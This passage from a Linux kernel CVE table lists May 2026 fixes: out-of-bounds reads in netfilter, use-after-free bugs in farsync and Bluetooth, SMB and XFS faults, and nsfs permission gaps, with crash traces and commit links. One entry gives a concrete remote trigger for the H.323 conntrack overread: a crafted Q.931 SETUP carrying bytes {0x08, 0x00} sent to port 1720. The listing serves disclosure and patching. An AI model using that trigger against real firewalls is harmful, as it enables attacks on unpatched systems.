https://git.kernel.org/stable/c/aa9083d97e2157da3c6fb45ddb1a97af7f188f7f https://git.kernel.org/stable/c/a631899025d47ea1aa6464d76db5b4d3b6d196fd https://git.kernel.org/stable/c/ffaf5c99d0f862db021fb1af8b813c1416b1beb2 https://git.kernel.org/stable/c/e1b8c6452ee99a30e188a88f3f3f804fb1c6004a https://git.kernel.org/stable/c/f31a8334e1c54b126fcecf98645a49b6bc5ad399 https://git.kernel.org/stable/c/479b05fc3ee272090f671b06a41f3da8aa78eece https://git.kernel.org/stable/c/6f13c1d2a6271c2e73226864a0e83de2770b6f34 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: xt_tcpmss: check remaining length before reading optlen Quoting reporter: In net/netfilter/xt_tcpmss.c (lines 53-68), the TCP option parser reads op[i+1] directly without validating the remaining option length. If the last byte of the option field is not EOL/NOP (0/1), the code attempts to index op[i+1]. In the case where i + 1 == optlen, this causes an out-of-bounds read, accessing memory past the optlen boundary (either reading beyond the stack buffer _opt or the following payload). | 2026-05-06 | 8.2 | CVE-2026-43190 | https://git.kernel.org/stable/c/f895191dc32c53eaf443b6443fe40945b2f92287 https://git.kernel.org/stable/c/cd5beda7e0e32865e214f28034bb92c1cecff885 https://git.kernel.org/stable/c/eaedc0bc18be46fe7f58170e967959a932c4f824 https://git.kernel.org/stable/c/07a9b32eaae792ff7d0fcac14d8920c937c0a9c3 https://git.kernel.org/stable/c/8b300f726640c48c3edfe9c453334dd801f4b74e https://git.kernel.org/stable/c/5e13d0a37666955b6cfddc0f73cb40ed645b8a05 https://git.kernel.org/stable/c/f6c412dcfd76b0516d51aa847d8f4c7b70381b09 https://git.kernel.org/stable/c/735ee8582da3d239eb0c7a53adca61b79fb228b3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: cifs: Fix locking usage for tcon fields We used to use the cifs_tcp_ses_lock to protect a lot of objects that are not just the server, ses or tcon lists. We later introduced srv_lock, ses_lock and tc_lock to protect fields within the corresponding structs. This was done to provide a more granular protection and avoid unnecessary serialization. There were still a couple of uses of cifs_tcp_ses_lock to provide tcon fields. In this patch, I've replaced them with tc_lock. | 2026-05-06 | 8.8 | CVE-2026-43215 | https://git.kernel.org/stable/c/953953abb66e52c224057ab91e404284fefeab62 https://git.kernel.org/stable/c/601dd3b79769b38d30b693c40afdb2a4b7edf9d0 https://git.kernel.org/stable/c/3969db6b22e3d90d8c5f22ac1a7fe0350a94c136 https://git.kernel.org/stable/c/8c59eeeeffa1524ef57e173a89a1a3ff539888d5 https://git.kernel.org/stable/c/96c4af418586ee9a6aab61738644366426e05316 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: wan: farsync: Fix use-after-free bugs caused by unfinished tasklets When the FarSync T-series card is being detached, the fst_card_info is deallocated in fst_remove_one(). However, the fst_tx_task or fst_int_task may still be running or pending, leading to use-after-free bugs when the already freed fst_card_info is accessed in fst_process_tx_work_q() or fst_process_int_work_q(). A typical race condition is depicted below: CPU 0 (cleanup) \| CPU 1 (tasklet) \| fst_start_xmit() fst_remove_one() \| tasklet_schedule() unregister_hdlc_device()\| \| fst_process_tx_work_q() //handler kfree(card) //free \| do_bottom_half_tx() \| card-> //use The following KASAN trace was captured: ================================================================== BUG: KASAN: slab-use-after-free in do_bottom_half_tx+0xb88/0xd00 Read of size 4 at addr ffff88800aad101c by task ksoftirqd/3/32 ... Call Trace: <IRQ> dump_stack_lvl+0x55/0x70 print_report+0xcb/0x5d0 ? do_bottom_half_tx+0xb88/0xd00 kasan_report+0xb8/0xf0 ? do_bottom_half_tx+0xb88/0xd00 do_bottom_half_tx+0xb88/0xd00 ? _raw_spin_lock_irqsave+0x85/0xe0 ? __pfx__raw_spin_lock_irqsave+0x10/0x10 ? __pfx___hrtimer_run_queues+0x10/0x10 fst_process_tx_work_q+0x67/0x90 tasklet_action_common+0x1fa/0x720 ? hrtimer_interrupt+0x31f/0x780 handle_softirqs+0x176/0x530 __irq_exit_rcu+0xab/0xe0 sysvec_apic_timer_interrupt+0x70/0x80 ... Allocated by task 41 on cpu 3 at 72.330843s: kasan_save_stack+0x24/0x50 kasan_save_track+0x17/0x60 __kasan_kmalloc+0x7f/0x90 fst_add_one+0x1a5/0x1cd0 local_pci_probe+0xdd/0x190 pci_device_probe+0x341/0x480 really_probe+0x1c6/0x6a0 __driver_probe_device+0x248/0x310 driver_probe_device+0x48/0x210 __device_attach_driver+0x160/0x320 bus_for_each_drv+0x101/0x190 __device_attach+0x198/0x3a0 device_initial_probe+0x78/0xa0 pci_bus_add_device+0x81/0xc0 pci_bus_add_devices+0x7e/0x190 enable_slot+0x9b9/0x1130 acpiphp_check_bridge.part.0+0x2e1/0x460 acpiphp_hotplug_notify+0x36c/0x3c0 acpi_device_hotplug+0x203/0xb10 acpi_hotplug_work_fn+0x59/0x80 ... Freed by task 41 on cpu 1 at 75.138639s: kasan_save_stack+0x24/0x50 kasan_save_track+0x17/0x60 kasan_save_free_info+0x3b/0x60 __kasan_slab_free+0x43/0x70 kfree+0x135/0x410 fst_remove_one+0x2ca/0x540 pci_device_remove+0xa6/0x1d0 device_release_driver_internal+0x364/0x530 pci_stop_bus_device+0x105/0x150 pci_stop_and_remove_bus_device+0xd/0x20 disable_slot+0x116/0x260 acpiphp_disable_and_eject_slot+0x4b/0x190 acpiphp_hotplug_notify+0x230/0x3c0 acpi_device_hotplug+0x203/0xb10 acpi_hotplug_work_fn+0x59/0x80 ... The buggy address belongs to the object at ffff88800aad1000 which belongs to the cache kmalloc-1k of size 1024 The buggy address is located 28 bytes inside of freed 1024-byte region The buggy address belongs to the physical page: page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0xaad0 head: order:3 mapcount:0 entire_mapcount:0 nr_pages_mapped:0 pincount:0 flags: 0x100000000000040(head|node=0|zone=1) page_type: f5(slab) raw: 0100000000000040 ffff888007042dc0 dead000000000122 0000000000000000 raw: 0000000000000000 0000000080100010 00000000f5000000 0000000000000000 head: 0100000000000040 ffff888007042dc0 dead000000000122 0000000000000000 head: 0000000000000000 0000000080100010 00000000f5000000 0000000000000000 head: 0100000000000003 ffffea00002ab401 00000000ffffffff 00000000ffffffff head: 0000000000000000 0000000000000000 00000000ffffffff 0000000000000000 page dumped because: kasan: bad access detected Memory state around the buggy address: ffff88800aad0f00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc ffff88800aad0f80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc >ffff88800aad1000: fa fb ---truncated--- | 2026-05-06 | 8.8 | CVE-2026-43232 | https://git.kernel.org/stable/c/cac048ebfbb92d91d719f74b59177cb70a7633b8 https://git.kernel.org/stable/c/086131807d119238cd464e5b0845e48d938dfd79 https://git.kernel.org/stable/c/ae894e47e1cd5a6bf8a0423d888c45df8b2b02dc https://git.kernel.org/stable/c/337d7b4112a47984ee319171b75b73bab47e7924 https://git.kernel.org/stable/c/200bdb8d367ca9b478f9c56ebe56411604d55c81 https://git.kernel.org/stable/c/21d341fe514fd07e345ed264c9eee21cb2061ca2 https://git.kernel.org/stable/c/04edfdfdfcdefc02408ab670607261b0a0a9a02e https://git.kernel.org/stable/c/bae8a5d2e759da2e0cba33ab2080deee96a09373 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_conntrack_h323: fix OOB read in decode_choice() In decode_choice(), the boundary check before get_len() uses the variable `len`, which is still 0 from its initialization at the top of the function: unsigned int type, ext, len = 0; ... if (ext || (son->attr & OPEN)) { BYTE_ALIGN(bs); if (nf_h323_error_boundary(bs, len, 0)) /* len is 0 here */ return H323_ERROR_BOUND; len = get_len(bs); /* OOB read */ When the bitstream is exactly consumed (bs->cur == bs->end), the check nf_h323_error_boundary(bs, 0, 0) evaluates to (bs->cur + 0 > bs->end), which is false. The subsequent get_len() call then dereferences *bs->cur++, reading 1 byte past the end of the buffer. If that byte has bit 7 set, get_len() reads a second byte as well. This can be triggered remotely by sending a crafted Q.931 SETUP message with a User-User Information Element containing exactly 2 bytes of PER-encoded data ({0x08, 0x00}) to port 1720 through a firewall with the nf_conntrack_h323 helper active. The decoder fully consumes the PER buffer before reaching this code path, resulting in a 1-2 byte heap-buffer-overflow read confirmed by AddressSanitizer. Fix this by checking for 2 bytes (the maximum that get_len() may read) instead of the uninitialized `len`. This matches the pattern used at every other get_len() call site in the same file, where the caller checks for 2 bytes of available data before calling get_len(). | 2026-05-06 | 8.2 | CVE-2026-43233 | https://git.kernel.org/stable/c/bcb50aa0b8f2b74a9fe5a1c7bee6f2657a288041 https://git.kernel.org/stable/c/2a3aac4205e7d2f1aca2e3827de8cdd517d36c4a https://git.kernel.org/stable/c/81f2fc5b0d0cf4696146f00f837596d10b92dead https://git.kernel.org/stable/c/7ef82863d42261817a6394c6c881bd6757a70f16 https://git.kernel.org/stable/c/53d32735d77ab56cc3fc7bd53a7d099418f19be1 https://git.kernel.org/stable/c/f0a83d0a4b7c127d32ac06d607a9214937716129 https://git.kernel.org/stable/c/35f1943d242e1b9f0b6e91c0c93bfb293a9f8224 https://git.kernel.org/stable/c/baed0d9ba91d4f390da12d5039128ee897253d60 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: smb: client: prevent races in ->query_interfaces() It was possible for two query interface works to be concurrently trying to update the interfaces. Prevent this by checking and updating iface_last_update under iface_lock. | 2026-05-06 | 8.8 | CVE-2026-43239 | https://git.kernel.org/stable/c/93e8e3ee165ae4609a1222b516b573837103d2c3 https://git.kernel.org/stable/c/ab6564f416a6eaf1199200b6100952407b438f7d https://git.kernel.org/stable/c/6287eefaf21ec805d42f941bd368018cf397a7f5 https://git.kernel.org/stable/c/76cc4faba0343c6db945b8dc75425b33d633e1b8 https://git.kernel.org/stable/c/c3c06e42e1527716c54f3ad2ced6a034b5f3a489 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: 9p/xen: protect xen_9pfs_front_free against concurrent calls The xenwatch thread can race with other back-end change notifications and call xen_9pfs_front_free() twice, hitting the observed general protection fault due to a double-free. Guard the teardown path so only one caller can release the front-end state at a time, preventing the crash. This is a fix for the following double-free: [ 27.052347] Oops: general protection fault, probably for non-canonical address 0x6b6b6b6b6b6b6b6b: 0000 [#1] SMP DEBUG_PAGEALLOC NOPTI [ 27.052357] CPU: 0 UID: 0 PID: 32 Comm: xenwatch Not tainted 6.18.0-02087-g51ab33fc0a8b-dirty #60 PREEMPT(none) [ 27.052363] RIP: e030:xen_9pfs_front_free+0x1d/0x150 [ 27.052368] Code: 90 90 90 90 90 90 90 90 90 90 90 90 90 41 55 41 54 55 48 89 fd 48 c7 c7 48 d0 92 85 53 e8 cb cb 05 00 48 8b 45 08 48 8b 55 00 <48> 3b 28 0f 85 f9 28 35 fe 48 3b 6a 08 0f 85 ef 28 35 fe 48 89 42 [ 27.052377] RSP: e02b:ffffc9004016fdd0 EFLAGS: 00010246 [ 27.052381] RAX: 6b6b6b6b6b6b6b6b RBX: ffff88800d66e400 RCX: 0000000000000000 [ 27.052385] RDX: 6b6b6b6b6b6b6b6b RSI: 0000000000000000 RDI: 0000000000000000 [ 27.052389] RBP: ffff88800a887040 R08: 0000000000000000 R09: 0000000000000000 [ 27.052393] R10: 0000000000000000 R11: 0000000000000000 R12: ffff888009e46b68 [ 27.052397] R13: 0000000000000200 R14: 0000000000000000 R15: ffff88800a887040 [ 27.052404] FS: 0000000000000000(0000) GS:ffff88808ca57000(0000) knlGS:0000000000000000 [ 27.052408] CS: e030 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 27.052412] CR2: 00007f9714004360 CR3: 0000000004834000 CR4: 0000000000050660 [ 27.052418] Call Trace: [ 27.052420] <TASK> [ 27.052422] xen_9pfs_front_changed+0x5d5/0x720 [ 27.052426] ? xenbus_otherend_changed+0x72/0x140 [ 27.052430] ? __pfx_xenwatch_thread+0x10/0x10 [ 27.052434] xenwatch_thread+0x94/0x1c0 [ 27.052438] ? __pfx_autoremove_wake_function+0x10/0x10 [ 27.052442] kthread+0xf8/0x240 [ 27.052445] ? __pfx_kthread+0x10/0x10 [ 27.052449] ? __pfx_kthread+0x10/0x10 [ 27.052452] ret_from_fork+0x16b/0x1a0 [ 27.052456] ? __pfx_kthread+0x10/0x10 [ 27.052459] ret_from_fork_asm+0x1a/0x30 [ 27.052463] </TASK> [ 27.052465] Modules linked in: [ 27.052471] ---[ end trace 0000000000000000 ]--- | 2026-05-06 | 8.8 | CVE-2026-43249 | https://git.kernel.org/stable/c/a5d00dff97118a32fcf5fec7a4c3f864c4620c4e https://git.kernel.org/stable/c/59e7707492576bdbfa8c1dbe7d90791df31e4773 https://git.kernel.org/stable/c/bf841d43f7a33d75675ba7f4e214ac1c67913065 https://git.kernel.org/stable/c/ce8ded2e61f47747e31eeefb44dc24a2160a7e32 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mailbox: mchp-ipc-sbi: fix out-of-bounds access in mchp_ipc_get_cluster_aggr_irq() The cluster_cfg array is dynamically allocated to hold per-CPU configuration structures, with its size based on the number of online CPUs. Previously, this array was indexed using hartid, which may be non-contiguous or exceed the bounds of the array, leading to out-of-bounds access. Switch to using cpuid as the index, as it is guaranteed to be within the valid range provided by for_each_online_cpu(). | 2026-05-06 | 8.4 | CVE-2026-43274 | https://git.kernel.org/stable/c/95438699c92947155823dcd3918049a07f3cd867 https://git.kernel.org/stable/c/0442b6229e2eedc95a6d3d18ce75dec7f5b5377c https://git.kernel.org/stable/c/f7c330a8c83c9b0332fd524097eaf3e69148164d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: ethernet: ec_bhf: Fix dma_free_coherent() dma handle dma_free_coherent() in error path takes priv->rx_buf.alloc_len as the dma handle. This would lead to improper unmapping of the buffer. Change the dma handle to priv->rx_buf.alloc_phys. | 2026-05-06 | 8.8 | CVE-2026-43283 | https://git.kernel.org/stable/c/0f589ee54fd6d76d3f75e745f7f12c64cbd749e5 https://git.kernel.org/stable/c/accd0599bc8e73b962247c6c6c70ca7aa1f8e8d0 https://git.kernel.org/stable/c/8320727be7ff704e07c87624efc2a4a75f54b3ce https://git.kernel.org/stable/c/1e300c33ef3cc544c2b9c693778fe9490cfe9184 https://git.kernel.org/stable/c/1b1371cd4032ae859838ebc74215f569987bb197 https://git.kernel.org/stable/c/1b1d3c5d58a80a19d017a409aa2308162bab5bbf https://git.kernel.org/stable/c/7e54ff938bebb173822b4c38b33fc164c1cabf92 https://git.kernel.org/stable/c/ffe68c3766997d82e9ccaf1cdbd47eba269c4aa2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xfrm: esp: avoid in-place decrypt on shared skb frags MSG_SPLICE_PAGES can attach pages from a pipe directly to an skb. TCP marks such skbs with SKBFL_SHARED_FRAG after skb_splice_from_iter(), so later paths that may modify packet data can first make a private copy. The IPv4/IPv6 datagram append paths did not set this flag when splicing pages into UDP skbs. That leaves an ESP-in-UDP packet made from shared pipe pages looking like an ordinary uncloned nonlinear skb. ESP input then takes the no-COW fast path for uncloned skbs without a frag_list and decrypts in place over data that is not owned privately by the skb. Mark IPv4/IPv6 datagram splice frags with SKBFL_SHARED_FRAG, matching TCP. Also make ESP input fall back to skb_cow_data() when the flag is present, so ESP does not decrypt externally backed frags in place. Private nonlinear skb frags still use the existing fast path. This intentionally does not change ESP output. In esp_output_head(), the path that appends the ESP trailer to existing skb tailroom without calling skb_cow_data() is not reachable for nonlinear skbs: skb_tailroom() returns zero when skb->data_len is nonzero, while ESP tailen is positive. Thus ESP output will either use the separate destination-frag path or fall back to skb_cow_data(). | 2026-05-08 | 8.8 | CVE-2026-43284 | https://git.kernel.org/stable/c/a6cb440f274a22456ef3e86b457344f1678f38f9 https://git.kernel.org/stable/c/ab8b995323e5237041472d07e5055f5f7dcdf15b https://git.kernel.org/stable/c/fe785bb3a8096dffcc4048a85cd0c83337eeecad https://git.kernel.org/stable/c/5d55c7336f8032d434adcc5fab987ccc93a44aec https://git.kernel.org/stable/c/8253aab4659ca16116b522203c2a6b18dccacea7 https://git.kernel.org/stable/c/50ed1e7873100f77abad20fd31c51029bc49cd03 https://git.kernel.org/stable/c/b54edf1e9a3fd3491bdcb82a21f8d21315271e0d https://git.kernel.org/stable/c/71a1d9d985d26716f74d21f18ee8cac821b06e97 https://git.kernel.org/stable/c/52646cbd00e765a6db9c3afe9535f26218276034 https://git.kernel.org/stable/c/f4c50a4034e62ab75f1d5cdd191dd5f9c77fdff4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: nfc: nci: Fix parameter validation for packet data Since commit 9c328f54741b ("net: nfc: nci: Add parameter validation for packet data") communication with nci nfc chips is not working any more. The mentioned commit tries to fix access of uninitialized data, but failed to understand that in some cases the data packet is of variable length and can therefore not be compared to the maximum packet length given by the sizeof(struct). | 2026-05-08 | 8.3 | CVE-2026-43291 | https://git.kernel.org/stable/c/a24a8a582da4426b2042e510a1080df84083b51d https://git.kernel.org/stable/c/f5218426f765eee22e178df9c126d974792fb6a5 https://git.kernel.org/stable/c/ad058a4317db7fdb3f09caa6ed536d24a62ce6a0 https://git.kernel.org/stable/c/3b91160e9a91b5a2662875417dc42dc5b0bf03ea https://git.kernel.org/stable/c/c692db813a7e3b7c3c17d6e9a3ad2a018bf1142b https://git.kernel.org/stable/c/498fc5d0d650c77e87fcc73808d4f43240c21805 https://git.kernel.org/stable/c/571dcbeb8e635182bb825ae758399831805693c2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: hci_sync: Fix UAF in le_read_features_complete This fixes the following backtrace caused by hci_conn being freed before le_read_features_complete but after hci_le_read_remote_features_sync so hci_conn_del -> hci_cmd_sync_dequeue is not able to prevent it: ================================================================== BUG: KASAN: slab-use-after-free in instrument_atomic_read_write include/linux/instrumented.h:96 [inline] BUG: KASAN: slab-use-after-free in atomic_dec_and_test include/linux/atomic/atomic-instrumented.h:1383 [inline] BUG: KASAN: slab-use-after-free in hci_conn_drop include/net/bluetooth/hci_core.h:1688 [inline] BUG: KASAN: slab-use-after-free in le_read_features_complete+0x5b/0x340 net/bluetooth/hci_sync.c:7344 Write of size 4 at addr ffff8880796b0010 by task kworker/u9:0/52 CPU: 0 UID: 0 PID: 52 Comm: kworker/u9:0 Not tainted syzkaller #0 PREEMPT(full) Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/25/2025 Workqueue: hci0 hci_cmd_sync_work Call Trace: <TASK> __dump_stack lib/dump_stack.c:94 [inline] dump_stack_lvl+0x116/0x1f0 lib/dump_stack.c:120 print_address_description mm/kasan/report.c:378 [inline] print_report+0xcd/0x630 mm/kasan/report.c:482 kasan_report+0xe0/0x110 mm/kasan/report.c:595 check_region_inline mm/kasan/generic.c:194 [inline] kasan_check_range+0x100/0x1b0 mm/kasan/generic.c:200 instrument_atomic_read_write include/linux/instrumented.h:96 [inline] atomic_dec_and_test include/linux/atomic/atomic-instrumented.h:1383 [inline] hci_conn_drop include/net/bluetooth/hci_core.h:1688 [inline] le_read_features_complete+0x5b/0x340 net/bluetooth/hci_sync.c:7344 hci_cmd_sync_work+0x1ff/0x430 net/bluetooth/hci_sync.c:334 process_one_work+0x9ba/0x1b20 kernel/workqueue.c:3257 process_scheduled_works kernel/workqueue.c:3340 [inline] worker_thread+0x6c8/0xf10 kernel/workqueue.c:3421 kthread+0x3c5/0x780 kernel/kthread.c:463 ret_from_fork+0x983/0xb10 arch/x86/kernel/process.c:158 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:246 </TASK> Allocated by task 5932: kasan_save_stack+0x33/0x60 mm/kasan/common.c:56 kasan_save_track+0x14/0x30 mm/kasan/common.c:77 poison_kmalloc_redzone mm/kasan/common.c:400 [inline] __kasan_kmalloc+0xaa/0xb0 mm/kasan/common.c:417 kmalloc_noprof include/linux/slab.h:957 [inline] kzalloc_noprof include/linux/slab.h:1094 [inline] __hci_conn_add+0xf8/0x1c70 net/bluetooth/hci_conn.c:963 hci_conn_add_unset+0x76/0x100 net/bluetooth/hci_conn.c:1084 le_conn_complete_evt+0x639/0x1f20 net/bluetooth/hci_event.c:5714 hci_le_enh_conn_complete_evt+0x23d/0x380 net/bluetooth/hci_event.c:5861 hci_le_meta_evt+0x357/0x5e0 net/bluetooth/hci_event.c:7408 hci_event_func net/bluetooth/hci_event.c:7716 [inline] hci_event_packet+0x685/0x11c0 net/bluetooth/hci_event.c:7773 hci_rx_work+0x2c9/0xeb0 net/bluetooth/hci_core.c:4076 process_one_work+0x9ba/0x1b20 kernel/workqueue.c:3257 process_scheduled_works kernel/workqueue.c:3340 [inline] worker_thread+0x6c8/0xf10 kernel/workqueue.c:3421 kthread+0x3c5/0x780 kernel/kthread.c:463 ret_from_fork+0x983/0xb10 arch/x86/kernel/process.c:158 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:246 Freed by task 5932: kasan_save_stack+0x33/0x60 mm/kasan/common.c:56 kasan_save_track+0x14/0x30 mm/kasan/common.c:77 __kasan_save_free_info+0x3b/0x60 mm/kasan/generic.c:587 kasan_save_free_info mm/kasan/kasan.h:406 [inline] poison_slab_object mm/kasan/common.c:252 [inline] __kasan_slab_free+0x5f/0x80 mm/kasan/common.c:284 kasan_slab_free include/linux/kasan.h:234 [inline] slab_free_hook mm/slub.c:2540 [inline] slab_free mm/slub.c:6663 [inline] kfree+0x2f8/0x6e0 mm/slub.c:6871 device_release+0xa4/0x240 drivers/base/core.c:2565 kobject_cleanup lib/kobject.c:689 [inline] kobject_release lib/kobject.c:720 [inline] kref_put include/linux/kref.h:65 [inline] kobject_put+0x1e7/0x590 lib/kobject. ---truncated--- | 2026-05-08 | 8.8 | CVE-2026-43322 | https://git.kernel.org/stable/c/260dc2be643b4a35b27008490c533613e3e53867 https://git.kernel.org/stable/c/035c25007c9e698bef3826070ee34bb6d778020c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: SMP: force responder MITM requirements before building the pairing response smp_cmd_pairing_req() currently builds the pairing response from the initiator auth_req before enforcing the local BT_SECURITY_HIGH requirement. If the initiator omits SMP_AUTH_MITM, the response can also omit it even though the local side still requires MITM. tk_request() then sees an auth value without SMP_AUTH_MITM and may select JUST_CFM, making method selection inconsistent with the pairing policy the responder already enforces. When the local side requires HIGH security, first verify that MITM can be achieved from the IO capabilities and then force SMP_AUTH_MITM in the response in both rsp.auth_req and auth. This keeps the responder auth bits and later method selection aligned. | 2026-05-08 | 8.8 | CVE-2026-43334 | https://git.kernel.org/stable/c/425a22c5373d4e1b46492ab869074ebeeade61f3 https://git.kernel.org/stable/c/7ab69426e7ecbd18a222ee2ec87ca612d30197d7 https://git.kernel.org/stable/c/01bb4045d2306c266178f49ce0c3576d237a3040 https://git.kernel.org/stable/c/91649c02c1baaa18cedf7fb425fa1f0f852c8183 https://git.kernel.org/stable/c/c8ff0ca6508535bccabd81c5c9dcc63de8a3d4fb https://git.kernel.org/stable/c/fa14e0e19820b1bbdb42185c9c4efa950bcffef9 https://git.kernel.org/stable/c/ec17efb1ef91506cfd17a77692eaf4bbacb520ea https://git.kernel.org/stable/c/d05111bfe37bfd8bd4d2dfe6675d6bdeef43f7c7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: smb: client: fix in-place encryption corruption in SMB2_write() SMB2_write() places write payload in iov[1..n] as part of rq_iov. smb3_init_transform_rq() pointer-shares rq_iov, so crypt_message() encrypts iov[1] in-place, replacing the original plaintext with ciphertext. On a replayable error, the retry sends the same iov[1] which now contains ciphertext instead of the original data, resulting in corruption. The corruption is most likely to be observed when connections are unstable, as reconnects trigger write retries that re-send the already-encrypted data. This affects SFU mknod, MF symlinks, etc. On kernels before 6.10 (prior to the netfs conversion), sync writes also used this path and were similarly affected. The async write path wasn't affected as it uses rq_iter which gets deep-copied. Fix by moving the write payload into rq_iter via iov_iter_kvec(), so smb3_init_transform_rq() deep-copies it before encryption. | 2026-05-08 | 8.1 | CVE-2026-43362 | https://git.kernel.org/stable/c/438e77435aee2894d5edf90be5c87004a57f6258 https://git.kernel.org/stable/c/52327268224fb9ccc7ecfbbdfdfff54b6e93c518 https://git.kernel.org/stable/c/92e64f1852f455f57d0850989e57c30d7fac7d95 https://git.kernel.org/stable/c/aea5e37388a080361110ab5790f57ae0af383650 https://git.kernel.org/stable/c/d78840a6a38d312dc1a51a65317bb67e46f0b929 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xfs: fix undersized l_iclog_roundoff values If the superblock doesn't list a log stripe unit, we set the incore log roundoff value to 512. This leads to corrupt logs and unmountable filesystems in generic/617 on a disk with 4k physical sectors... XFS (sda1): Mounting V5 Filesystem ff3121ca-26e6-4b77-b742-aaff9a449e1c XFS (sda1): Torn write (CRC failure) detected at log block 0x318e. Truncating head block from 0x3197. XFS (sda1): failed to locate log tail XFS (sda1): log mount/recovery failed: error -74 XFS (sda1): log mount failed XFS (sda1): Mounting V5 Filesystem ff3121ca-26e6-4b77-b742-aaff9a449e1c XFS (sda1): Ending clean mount ...on the current xfsprogs for-next which has a broken mkfs. xfs_info shows this... meta-data=/dev/sda1 isize=512 agcount=4, agsize=644992 blks = sectsz=4096 attr=2, projid32bit=1 = crc=1 finobt=1, sparse=1, rmapbt=1 = reflink=1 bigtime=1 inobtcount=1 nrext64=1 = exchange=1 metadir=1 data = bsize=4096 blocks=2579968, imaxpct=25 = sunit=0 swidth=0 blks naming =version 2 bsize=4096 ascii-ci=0, ftype=1, parent=1 log =internal log bsize=4096 blocks=16384, version=2 = sectsz=4096 sunit=0 blks, lazy-count=1 realtime =none extsz=4096 blocks=0, rtextents=0 = rgcount=0 rgsize=268435456 extents = zoned=0 start=0 reserved=0 ...observe that the log section has sectsz=4096 sunit=0, which means that the roundoff factor is 512, not 4096 as you'd expect. We should fix mkfs not to generate broken filesystems, but anyone can fuzz the ondisk superblock so we should be more cautious. I think the inadequate logic predates commit a6a65fef5ef8d0, but that's clearly going to require a different backport. | 2026-05-08 | 8.2 | CVE-2026-43365 | https://git.kernel.org/stable/c/5afae524f83d6a18517298491a5624cb0eae5029 https://git.kernel.org/stable/c/2ecda4b83749c1fef0c9dea4fd5e8b513aba3e40 https://git.kernel.org/stable/c/41e91dff2d3974730b5ee50daa8e27ec254cbf91 https://git.kernel.org/stable/c/e88ce9f0536f3b2149afb70625cfc4bd74a4ac6d https://git.kernel.org/stable/c/446a1f5bb64ba38adb93cb043ff0f7b85e8937ca https://git.kernel.org/stable/c/5e7148402dfc4a5b7894d8e97b15e5c2e70924aa https://git.kernel.org/stable/c/52a8a1ba883defbfe3200baa22cf4cd21985d51a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ksmbd: Don't log keys in SMB3 signing and encryption key generation When KSMBD_DEBUG_AUTH logging is enabled, generate_smb3signingkey() and generate_smb3encryptionkey() log the session, signing, encryption, and decryption key bytes. Remove the logs to avoid exposing credentials. | 2026-05-08 | 8.1 | CVE-2026-43377 | https://git.kernel.org/stable/c/4084ed720d7d5f4e975c9e4a6267a552dad3b24a https://git.kernel.org/stable/c/fec5c70b82af3f59f15bb984df94e5ad1fccfb1e https://git.kernel.org/stable/c/3fe2d9ec166b7df9a8df6c0fdcfc210572e27e3f https://git.kernel.org/stable/c/407cc37c21d51f9b9d4d20204b04890880cfa6ae https://git.kernel.org/stable/c/c6b01b997a2094969e315f1ebfc1d64b8ae2163d https://git.kernel.org/stable/c/441336115df26b966575de56daf7107ed474faed |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nsfs: tighten permission checks for handle opening Even privileged services should not necessarily be able to see other privileged services' namespaces, so they can't leak information to each other. Use the may_see_all_namespaces() helper that centralizes this policy until the nstree adapts. | 2026-05-08 | 8.8 | CVE-2026-43391 | https://git.kernel.org/stable/c/1797ee11451f1b2be69863a9f5bd43b948813fdf https://git.kernel.org/stable/c/d2324a9317f00013facb0ba00b00440e19d2af5e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nsfs: tighten permission checks for ns iteration ioctls Even privileged services should not necessarily be able to see other privileged services' namespaces, so they can't leak information to each other. Use the may_see_all_namespaces() helper that centralizes this policy until the nstree adapts. | 2026-05-08 | 8.8 | CVE-2026-43403 | https://git.kernel.org/stable/c/3376b345df155ca36d8611857b41ff7d5183fc38 https://git.kernel.org/stable/c/2f3dea284c761c890d676f77d5e55c0c496b4ef4 https://git.kernel.org/stable/c/0ad650e60150eda789deca5e78a6a09d26bf8fc9 https://git.kernel.org/stable/c/e6b899f08066e744f89df16ceb782e06868bd148 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: x_tables: guard option walkers against 1-byte tail reads When the last byte of options is a non-single-byte option kind, walkers that advance with i += op[i + 1] ? : 1 can read op[i + 1] past the end of the option area. Add an explicit i == optlen - 1 check before dereferencing op[i + 1] in xt_tcpudp and xt_dccp option walkers. | 2026-05-08 | 8.2 | CVE-2026-43452 | https://git.kernel.org/stable/c/c2a445367a496a3c25dbc940c10c8bd1cfd4c14a https://git.kernel.org/stable/c/ae1e1267650638136b84c23f2b31250f0ccb6823 https://git.kernel.org/stable/c/c39f84e4be1be63fc60ca7141ea7b76edcea5907 https://git.kernel.org/stable/c/9b94f0e42ed248eb31929da84ed9f5310d7ff540 https://git.kernel.org/stable/c/5b18b8b35c7cded2d17b2b2604c9b0694ff48d1c https://git.kernel.org/stable/c/bc18551c6169eac5ed813778d3e3e484002dbbe5 https://git.kernel.org/stable/c/d04800323336eebf441d153f43234eac9b833d36 https://git.kernel.org/stable/c/cfe770220ac2dbd3e104c6b45094037455da81d4 |
